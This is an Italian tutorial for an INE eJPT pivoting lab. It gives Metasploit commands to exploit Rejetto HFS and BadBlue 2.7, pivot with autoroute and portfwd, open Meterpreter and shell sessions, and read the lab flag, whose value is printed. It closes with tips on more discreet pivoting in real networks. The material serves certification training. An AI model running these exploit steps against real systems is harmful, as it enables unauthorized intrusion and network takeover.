Tutorials

Pivoting Lab Guide (INE eJPT Preparation)

Questa guida approfondita descrive passo-passo l'approccio usato in un laboratorio di pivoting proposto da INE, utile per la preparazione alla certificazione eJPT. ---

#exploitation#metasploit

Pivoting Lab Guide (INE eJPT Preparation)

Questa guida approfondita descrive passo-passo l'approccio usato in un laboratorio di pivoting proposto da INE, utile per la preparazione alla certificazione eJPT.


Step 1: Verifica connettività verso la macchina target

Apri la macchina Kali tramite il link del laboratorio. Verifica la raggiungibilità della macchina target:

bash
ping -c 4 demo1.ine.local

Step 2: Scansione iniziale con Nmap

Identifica i servizi in esecuzione sulla prima macchina target:

bash
nmap demo1.ine.local

Poi focalizzati sulla porta 80 per recuperare informazioni di versione:

bash
nmap -sV -p80 demo1.ine.local

Step 3: Ricerca dell'exploit

Usa searchsploit per cercare exploit compatibili con il servizio individuato (Rejetto HFS):

bash
searchsploit hfs

Identifica il modulo exploit/windows/http/rejetto_hfs_exec utilizzabile con Metasploit.


Step 4: Esecuzione dell'exploit su HFS

Apri msfconsole e configura il modulo:

bash
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS demo1.ine.local
exploit

Dovresti ricevere una sessione Meterpreter attiva.

Verifica l'indirizzo IP della macchina compromessa:

bash
ipconfig

Step 5: Pivoting verso la seconda macchina

Non è possibile accedere direttamente alla seconda macchina dal tuo host. Serve quindi il pivoting.

Aggiungi route:

bash
run autoroute -s 10.0.16.0/20

Lancia uno scanner sulla seconda macchina (demo2.ine.local):

bash
background
use auxiliary/scanner/portscan/tcp
set RHOSTS demo2.ine.local
set PORTS 1-100
exploit

Viene scoperta la porta 80.


Step 6: Port forwarding

Riprendi la sessione Meterpreter:

bash
sessions -i 1

Configura il port forwarding:

bash
portfwd add -l 1234 -p 80 -r demo2.ine.local
portfwd list

Scansiona la porta 1234 in locale (che è forwardata alla porta 80 remota):

bash
nmap -sV -sS -p 1234 localhost

Step 7: Exploit della seconda macchina (BadBlue)

Cerca exploit per BadBlue 2.7:

bash
searchsploit badblue 2.7

Utilizza il modulo exploit/windows/http/badblue_passthru:

bash
use exploit/windows/http/badblue_passthru
set PAYLOAD windows/meterpreter/bind_tcp
set RHOSTS demo2.ine.local
exploit

Una nuova sessione Meterpreter viene stabilita.


Step 8: Ricerca del flag

Entra in shell e naviga nella root:

bash
shell
cd /
dir
type flag.txt

Flag: c46d12f28d87ae0b92b05ebd9fb8e817


Considerazioni Finali e Best Practice

  • Utilizza sempre autoroute per aggiornare correttamente le tabelle di routing all'interno di Metasploit.
  • Il comando portfwd è essenziale per eseguire scansioni o collegamenti verso host non direttamente raggiungibili.
  • In una rete reale, potresti voler usare proxychains o socks proxy per effettuare pivoting più discreto (con strumenti come socat o proxychains-ng).
  • In fase di escalation, combina le informazioni di routing con tecniche di privilege escalation per estendere il controllo sulla rete.